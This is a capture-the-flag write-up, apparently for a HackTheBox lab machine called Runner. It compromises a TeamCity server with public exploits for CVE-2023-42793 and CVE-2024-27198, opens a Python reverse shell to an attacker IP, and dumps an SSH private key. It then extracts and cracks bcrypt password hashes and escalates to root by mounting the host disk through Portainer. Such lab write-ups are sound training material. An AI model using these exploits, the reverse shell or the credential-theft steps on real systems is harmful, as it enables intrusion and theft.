TCP Scan

> TARGET=10.129.50.228 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• add dns entry

echo '10.129.50.228    runner.htb' >> /etc/hosts

UDP scan

> nmap -p- --min-rate=1000 -T4 10.129.50.228 -Pn -sU -vvv -oN nmap_udp_all.nmap
[x]

web enum

• headers

> curl -I http://runner.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Apr 2024 22:26:49 GMT
Content-Type: text/html
Content-Length: 16910
Last-Modified: Wed, 03 Apr 2024 14:41:49 GMT
Connection: keep-alive
ETag: "660d6aad-420e"
Accept-Ranges: bytes

> curl -I http://runner.htb:8000/
HTTP/1.1 404 Not Found
Date: Mon, 22 Apr 2024 22:26:55 GMT
Content-Length: 9
Content-Type: text/plain; charset=utf-8

• dirsearch

> dirsearch -u http://runner.htb/
[18:24:29] 301 -  178B  - /assets  ->  http://runner.htb/assets/
[18:24:29] 403 -  564B  - /assets/

> dirsearch -u http://runner.htb/assets/
[18:41:13] 301 -  178B  - /assets/js  ->  http://runner.htb/assets/js/
[18:42:07] 301 -  178B  - /assets/css  ->  http://runner.htb/assets/css/
[18:42:17] 301 -  178B  - /assets/fonts  ->  http://runner.htb/assets/fonts/
[18:42:22] 301 -  178B  - /assets/img  ->  http://runner.htb/assets/img/

> dirsearch -u http://runner.htb/ -m POST
[18:46:36] 301 -  178B  - /assets  ->  http://runner.htb/assets/
[18:46:36] 403 -  564B  - /assets/

> dirsearch -u http://runner.htb:8000/ -m POST
[18:49:54] 200 -    3B  - /health
[18:50:46] 200 -    9B  - /version

> dirsearch -u http://runner.htb:8000/
[18:35:14] 200 -    3B  - /health
[18:36:11] 200 -    9B  - /version

> curl -i http://runner.htb:8000/health
HTTP/1.1 200 OK
Date: Mon, 22 Apr 2024 22:35:37 GMT
Content-Length: 3
Content-Type: text/plain; charset=utf-8

OK

> curl -i http://runner.htb:8000/version
HTTP/1.1 200 OK
Date: Mon, 22 Apr 2024 22:36:41 GMT
Content-Length: 9
Content-Type: text/plain; charset=utf-8

0.0.0-src

• subdomain

> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://runner.htb/" -H "Host: FUZZ.runner.htb" --hh 154
[x]
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://runner.htb/" -H "Host: FUZZ.runner.htb" --hh 154
000013170:   401        1 L      9 W        66 Ch       "teamcity"

teamcity.runner.htb

• Teamcity Version 2023.05.3 (build 129390) found

> curl -iL http://teamcity.runner.htb/
HTTP/1.1 401
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Apr 2024 23:16:07 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
TeamCity-Node-Id: MAIN_SERVER
WWW-Authenticate: Basic realm="TeamCity"
WWW-Authenticate: Bearer realm="TeamCity"
Cache-Control: no-store

Authentication required
To login manually go to "/login.html" page

• Search online and found exploit: https://www.exploit-db.com/exploits/51884

> python3 51884.py -u http://teamcity.runner.htb
=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.Zk01OXVXWmx1b1hWOWtmQzNkU01FVEJETUpj.MmJlOWZhYzEtZTk4OS00ZDZlLThlYzEtMzJlMjJiYWRmN2I5
Successfully exploited!
URL: http://teamcity.runner.htb
Username: city_admintwm5
Password: Main_password!!**

• From reading http://teamcity.runner.htb/admin/admin.html?item=audit, john(admin) is likely the next target
• Found exploit for CVE-2024-27198-RCE, which applies to teamcity before 2023.11.04 (https://nvd.nist.gov/vuln/detail/CVE-2024-27198): https://github.com/W01fh4cker/CVE-2024-27198-RCE

> python3 CVE-2024-27198-RCE.py -t http://teamcity.runner.htb

 _____                     ____ _ _           ____   ____ _____
|_   _|__  __ _ _ __ ___  / ___(_) |_ _   _  |  _ \ / ___| ____|
  | |/ _ \/ _` | '_ ` _ \| |   | | __| | | | | |_) | |   |  _|
  | |  __/ (_| | | | | | | |___| | |_| |_| | |  _ <| |___| |___
  |_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
                                      |___/
                                                                            Author: @W01fh4cker
                                                                            Github: https://github.com/W01fh4cker

[+] User added successfully, username: er6w8596, password: J0gy6Jbeyf, user ID: 19
[+] The target operating system version is linux
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)

• search for info

command > find / -type f -name id_rsa 2>/dev/null
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa

• for a better shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.65",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

• found private key

command > cat /data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
KgK8c9z2ecgZsAAAALam9obkBydW5uZXI=
-----END OPENSSH PRIVATE KEY-----

• login as user john and get the user flag

john@runner:~$ cat user.txt
33af75aa10ae878176716e37573ccc86

pe

• enum inside the previous container as tcuser

[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
tcuser         1  0.0  0.0   6980  3360 ?        Ss   Apr22   0:00 /bin/bash /run-server.sh
tcuser        14  0.0  0.0   2616  1708 ?        S    Apr22   0:00 /bin/sh bin/teamcity-server.sh run -config conf/server.xml
tcuser        19  0.0  0.0   2616  1792 ?        S    Apr22   0:00  _ sh /opt/teamcity/bin/teamcity-server-restarter.sh run -config conf/server.xml

[+] Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_tcuser/136
/tmp/hsperfdata_tcuser/266
/opt/teamcity/.gnupg/pubring.kbx
/opt/teamcity/.gnupg/trustdb.gpg
/opt/teamcity/p.sh
/data/teamcity_server/datadir/system/buildserver.log
/data/teamcity_server/datadir/system/buildserver.lck
/data/teamcity_server/datadir/system/caches/buildsMetadata/metadataDB.lck

[+] Backup folders
drwxr-xr-x 2 tcuser tcuser 4096 Aug 24  2023 /opt/teamcity/webapps/ROOT/admin/backup
total 20
-rw-r--r-- 1 tcuser tcuser  3140 Aug 23  2023 backupHistory.jsp
-rw-r--r-- 1 tcuser tcuser   264 Aug 23  2023 backupPage.jsp
-rw-r--r-- 1 tcuser tcuser 12072 Aug 23  2023 backupRun.jsp


/data/teamcity_server/datadir/system/caches/buildsMetadata/metadataDB.data

• In TeamCity webapp, there is a feature to backup the db http://teamcity.runner.htb/admin/admin.html?item=backup
• Then, the db can be dumped like below

tcuser@647a82f29ca0:/data/teamcity_server/datadir/config$ unzip -p /data/teamcity_server/datadir/backup/TeamCity_Backup_20240423_022953.zip database_dump/users
<City_Backup_20240423_022953.zip database_dump/users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1713827946821, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_admintwm5, $2a$07$rpBbX.ccq7lt3DsR1Ut.YeZFyU4DeIisKrxJLAvaBVlo.u8MXMkeG, , angry-admin@funnybunny.org, 1713827964829, BCRYPT
12, piiixi1y, $2a$07$cSgOHnpLwziQSIvHoO8kRe0VSP.NXJSe3JynLBApWUINilDVGjdNK, , piiixi1y@example.com, 1713830413336, BCRYPT
13, el03v2jo, $2a$07$o97Nx2o8c3goRMtOoRj3q.WX4vDOSMHiMBpsmHfuOJWCIkQgX0kW2, , el03v2jo@example.com, 1713830436816, BCRYPT
14, zezpaqiz, $2a$07$5tep/WV2TB8QQhZQPtaKbuD8caTXjTNXzQA7Aa6eSEb54VGOkOFhG, , zezpaqiz@example.com, 1713830552120, BCRYPT
15, 2ja0xzss, $2a$07$YVC9ntyCrmDufyCG6dXDruBr6h.icrDRbv4DykcECUNBQTlke0I0O, , 2ja0xzss@example.com, 1713830604863, BCRYPT
16, 7p2ikmhv, $2a$07$8CErAJPRKvOjrKVXTVz1S.qP1/wDZaySipQRI/08MdPe56Zrg9pd6, , 7p2ikmhv@example.com, 1713830679865, BCRYPT
17, ox1bdcqk, $2a$07$kE1U..sK5ys4JX.rQf4Ys.G1iAOEE7WUV4hj1YY4DREcv//gLwzGe, , ox1bdcqk@example.com, 1713830724344, BCRYPT
18, lqoc84gf, $2a$07$cQp0.LkxgiYHIG1gxw/2oufts/c/hj3c96TbA2k4V31J3gBrjOFoO, , lqoc84gf@example.com, 1713830752768, BCRYPT
19, er6w8596, $2a$07$mMxKI9vOHSA6do6a6UFTRuCglFx6wBb35Wl7LBxjBUNCM5rB3gNMK, , er6w8596@example.com, 1713831252028, BCRYPT
20, shdphvsh, $2a$07$frXYscs6JvxvHXtP/WR4UuTDauUwgISCUYQh6t8MXiit9nEIqJVuC, , shdphvsh@example.com, 1713832130609, BCRYPT
21, x66tukhq, $2a$07$U/8/5jRSLQetrgPIY6GGWut.HUAd7SqvbFt7trGI1bDcimV99MMrW, , x66tukhq@example.com, 1713837560717, BCRYPT

• crack the password of matthew:piper123

> echo '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em' > hash
> john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123         (?)
1g 0:00:01:39 DONE (2024-04-22 22:34) 0.01000g/s 520.8p/s 520.8c/s 520.8C/s pituca..omayra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

• enum in server as john, there are locally running services

john@runner:~$ netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -

• Forward the ports

> ssh -i john_id_rsa john@runner.htb -L 9443:127.0.0.1:9443 -L 5005:127.0.0.1:5005 -L 8111:127.0.0.1:8111 -L 9000:127.0.0.1:9000

• Found portainer.io running at https://localhost:9443/#!/auth
• 9000 and 9443 are for portainer, 8111 is for teamcity, need to find out 5005

> nmap -p5005 127.0.0.1 -sV -vvv

PORT     STATE SERVICE REASON         VERSION
5005/tcp open  jdwp    syn-ack ttl 64 Java Debug Wire Protocol (Reference Implementation) version 17.0 17.0.7

portainer.io

• browse to https://localhost:9443/ and login using matthew

• Create a volum and add the following options. This will reference to the host’s /dev/sda2 (system directory), so when mounting to the container, the container will have access to the host’s file system

device 	/dev/sda2
o 	    defaults
type 	ext4

• Create a container with the above volume added, and mounted to a file path, e.g /rootfs

image       ubuntu:latest
configure a tty

• then, create the container, run it and attach to the terminal and access the root flag

root@052ccc5f0d71:/# ls rootfs/root/
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
root@052ccc5f0d71:/# cat rootfs/root/root.txt
b5634f743d01f53357d8995a659839fa
root@052ccc5f0d71:/#

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack